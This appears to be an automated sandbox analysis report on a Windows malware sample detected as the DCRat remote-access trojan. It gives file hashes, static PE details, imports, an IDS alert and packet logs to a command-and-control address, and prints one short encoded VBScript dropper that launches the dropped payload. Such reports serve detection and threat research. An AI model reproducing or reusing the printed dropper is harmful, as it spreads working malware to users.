                        SSDEEP:6:G3wqK+NkLzWbHY08nZNDd3RL1wQJRMONjWcMOAj7s:G+MCzWLY04d3XBJGeicpAj7s
                        MD5:E34F13B2A4F4209E33BC6FFD2A366482
                        SHA1:480E5CA6CB7CCF7487321919CEFDCDD161F049ED
                        SHA-256:8A4BD2382B2D049C2980730E2FCEE8C4F4FCB62C053E77D1745BF02E74482D7E
                        SHA-512:5A217E9D8168FE06911C66F517D08C13EE9B2449B677B1DF503489DC8CEC0AE1BC7A2BDF4FE0AA9E25E91EFF3F24735043F81427C9D00CE61CF8AB72E74AD5CF
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJtza+MADKhknDsWUkDW.H.Yz1zsHy:".8qSKN;!R8CDJSPZSP6lsd.lz0AAA==^#~@.

                        C:\hyperBrowsermonitorNet\cyFyzmRWbIwTjqG.bat

                        Download File
                        Process:C:\Users\user\Desktop\CRf9KBk4ra.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):47
                        Entropy (8bit):4.059255342369256
                        Encrypted:false
                        SSDEEP:3:I56AXX5LM2UR9cX/L9EVn:Ilm2UR0L9m
                        MD5:8041D08BB34F0974694868F5BA761919
                        SHA1:2D5522E576AF21DB878AA4F77F4B9F8C9E398A4A
                        SHA-256:D3876A226D38F82A3FE54BFA202435F0FBE6785046C1258DFABAABB1F9240B52
                        SHA-512:0FFB112A3B64C7637290F38971DF947731C449B806604F131935B7D37000A8C2AB4322FC2E1E17F69E1D973235ACE60E71788855E3CAFB9C73077D22134A0FD5
                        Malicious:false
                        Preview:"C:\hyperBrowsermonitorNet\serverwinCommon.exe"

                        C:\hyperBrowsermonitorNet\serverwinCommon.exe

                        Download File
                        Process:C:\Users\user\Desktop\CRf9KBk4ra.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1060864
                        Entropy (8bit):6.655706570123378
                        Encrypted:false
                        SSDEEP:24576:eJ6l5/ZSKMFNz12i3Z8Lkj7GDAd7Gcndd2J:eJU5zEz2t6J7G2g
                        MD5:BB31080A1AC450BC92BE05ED245BBCEB
                        SHA1:593E5C2054DA1A65009E1BA08C6580B3FB23FB46
                        SHA-256:6435DC89765468B566887BF9AE0F25B79E701A73223D92C1764CACF2F671BFF3
                        SHA-512:830A4EBD1D6022F188C32AEFB25A4D50A73C2E69789349FD6FDD43594A324C79C7369C99B840313B663646B5C7F283DB4B7CCDD6DAC39632929156934708D8DA
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 74%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.................................`...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......*..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        \Device\Null

                        Download File
                        Process:C:\Windows\System32\w32tm.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):151
                        Entropy (8bit):4.790202491899376
                        Encrypted:false
                        SSDEEP:3:VLV993J+miJWEoJ8FXyVTtQvPDUtNTUvdNvprU9qNvj:Vx993DEUFtDwmO
                        MD5:28937A0C40D82281EB9796E35C6C8417
                        SHA1:B431CA5E5C60C8D8BAE5FE64A4F3379292952E9A
                        SHA-256:F3D5DB276980B09390F4023D7F54B15E5C2E63600BAFFD4465AA2E7BD8598409
                        SHA-512:5EC3999F6D60FA8239B1276F4E7D3C543E1C620123C2CD269A6C0B37E1E268DBD06A9DA472A68B18C1E85329B5D932A45EDDD63F793F1E0904E5EA5E28EF114C
                        Malicious:false
                        Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/01/2025 02:26:14..02:26:14, error: 0x80072746.02:26:19, error: 0x80072746.

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.749271077485271
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        • Win32 Executable (generic) a (10002005/4) 49.97%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:CRf9KBk4ra.exe
                        File size:1'377'924 bytes
                        MD5:8b7b1adcb1ea8edff9888558ef898054
                        SHA1:65f2ff2c3a00621a5eaa1a9e89662950659222c2
                        SHA256:356c2aed44aef4579e0db1c31f4162e9dfa89f04589ddb14211afbbdf621a61b
                        SHA512:e2fd060b7ee236576ee4fb70dd0a4e5afb44fbf0714c4aaf73c4a3307fae0e961f291f90a8d19424c00bd0cae387cac791281a53fb411402371897666b21008f
                        SSDEEP:24576:U2G/nvxW3Ww0tJJ6l5/ZSKMFNz12i3Z8Lkj7GDAd7Gcndd2JL:UbA30JJU5zEz2t6J7G2gp
                        TLSH:D8556A017E44CA21F01A2633C2EF490487B4AC516BA6F71B7EBA376D55123A37C1DADB
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                        File Icon

                        Icon Hash:1515d4d4442f2d2d

                        Static PE Info

                        General

                        Entrypoint:0x41ec40
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                        Entrypoint Preview

                        Instruction
                        call 00007FD30C8613E9h
                        jmp 00007FD30C860DFDh
                        cmp ecx, dword ptr [0043E668h]
                        jne 00007FD30C860F75h
                        ret
                        jmp 00007FD30C86156Eh
                        int3
                        int3
                        int3
                        int3
                        int3
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007FD30C853D07h
                        mov dword ptr [esi], 00435580h
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 00435588h
                        mov dword ptr [ecx], 00435580h
                        ret
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        lea eax, dword ptr [ecx+04h]
                        mov dword ptr [ecx], 00435568h
                        push eax
                        call 00007FD30C86410Dh
                        pop ecx
                        ret
                        push ebp
                        mov ebp, esp
                        sub esp, 0Ch
                        lea ecx, dword ptr [ebp-0Ch]
                        call 00007FD30C853C9Eh
                        push 0043B704h
                        lea eax, dword ptr [ebp-0Ch]
                        push eax
                        call 00007FD30C863822h
                        int3
                        push ebp
                        mov ebp, esp
                        sub esp, 0Ch
                        lea ecx, dword ptr [ebp-0Ch]
                        call 00007FD30C860F14h
                        push 0043B91Ch
                        lea eax, dword ptr [ebp-0Ch]
                        push eax
                        call 00007FD30C863805h
                        int3
                        jmp 00007FD30C865853h
                        jmp dword ptr [00433260h]
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        push 00421EB0h
                        push dword ptr fs:[00000000h]

                        Rich Headers

                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [C++] VS2015 UPD3.1 build 24215
                        • [EXP] VS2015 UPD3.1 build 24215
                        • [RES] VS2015 UPD3 build 24213
                        • [LNK] VS2015 UPD3.1 build 24215

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                        PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                        RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                        RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                        RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                        RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                        RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                        RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                        RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                        RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
                        RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
                        RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
                        RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
                        RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
                        RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
                        RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
                        RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
                        RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
                        RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
                        RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
                        RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
                        RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
                        RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
                        RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
                        RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
                        RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
                        RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                        Imports

                        DLLImport
                        KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                        gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-01-02T06:37:09.091579+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.449731141.8.192.16480TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 2, 2025 06:37:06.913286924 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:06.913325071 CET44349730172.67.19.24192.168.2.4
                        Jan 2, 2025 06:37:06.913393021 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:06.928538084 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:06.928555012 CET44349730172.67.19.24192.168.2.4
                        Jan 2, 2025 06:37:07.408551931 CET44349730172.67.19.24192.168.2.4
                        Jan 2, 2025 06:37:07.408724070 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:07.445614100 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:07.445635080 CET44349730172.67.19.24192.168.2.4
                        Jan 2, 2025 06:37:07.445883989 CET44349730172.67.19.24192.168.2.4
                        Jan 2, 2025 06:37:07.491779089 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:07.872131109 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:07.915337086 CET44349730172.67.19.24192.168.2.4
                        Jan 2, 2025 06:37:08.190819979 CET44349730172.67.19.24192.168.2.4
                        Jan 2, 2025 06:37:08.190923929 CET44349730172.67.19.24192.168.2.4
                        Jan 2, 2025 06:37:08.190970898 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:08.197436094 CET49730443192.168.2.4172.67.19.24
                        Jan 2, 2025 06:37:08.367615938 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:08.372476101 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:08.372543097 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:08.372654915 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:08.377448082 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091468096 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091480970 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091506004 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091550112 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091562986 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091578960 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.091602087 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.091602087 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091614008 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091639042 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091650009 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091655016 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.091660976 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.091681004 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.091696978 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.096498966 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.096532106 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.096544027 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.096600056 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.298444986 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.298456907 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.298537016 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.298602104 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.298614025 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.298670053 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.298707962 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.298726082 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.298738003 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.298782110 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.299129009 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.299139977 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.299151897 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.299160004 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.299173117 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.299206018 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.299621105 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.299633026 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.299638987 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.299644947 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.299709082 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.300265074 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.300276995 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.300287008 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.300297976 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.300308943 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.300319910 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.300323009 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.300342083 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.301131964 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.301176071 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.301179886 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.303425074 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.303435087 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.303442001 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.303459883 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.303472042 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.351166010 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.387185097 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413891077 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413902998 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413913012 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413918018 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413933039 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413942099 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413953066 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413986921 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.413996935 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.414006948 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.414019108 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.414072037 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.414072037 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.414072037 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.414134026 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.414163113 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.418128014 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.422897100 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627397060 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627417088 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627434969 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627461910 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627470970 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627481937 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627490044 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.627567053 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627583027 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627605915 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627619028 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627629042 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627655029 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.627655029 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.627655029 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.627954960 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627965927 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627975941 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627985954 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.627996922 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628009081 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.628041983 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.628206968 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628238916 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628248930 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628271103 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.628287077 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628297091 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628305912 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628329039 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.628355026 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.628582001 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628606081 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628616095 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628638983 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.628659010 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628669024 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628679037 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628700018 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.628727913 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.628784895 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628796101 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628804922 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.628829002 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.629189014 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629221916 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629231930 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629240990 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.629245043 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629268885 CET4973180192.168.2.4141.8.192.164
                        Jan 2, 2025 06:37:09.629297972 CET8049731141.8.192.164192.168.2.4
                        Jan 2, 2025 06:37:09.629308939 CET8049731141.8.192.164192.168.2.4
